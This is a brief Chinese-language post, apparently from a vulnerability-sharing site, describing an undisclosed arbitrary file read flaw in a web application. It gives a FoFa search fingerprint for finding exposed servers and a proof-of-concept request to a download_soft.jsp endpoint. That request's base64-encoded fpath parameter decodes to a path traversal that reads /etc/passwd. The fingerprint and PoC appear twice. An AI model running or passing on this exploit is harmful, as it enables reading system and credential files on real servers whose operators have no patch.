被漏洞扫描翻日志找到的任意文件读取漏洞(未公开)
FoFa
body="k-login-layer"
POC
只在日志里面翻到Linux版本的利用方式
/pub/tools/dowload_soft.jsp?fpath=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
body="k-login-layer"
只在日志里面翻到Linux版本的利用方式
/pub/tools/dowload_soft.jsp?fpath=Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==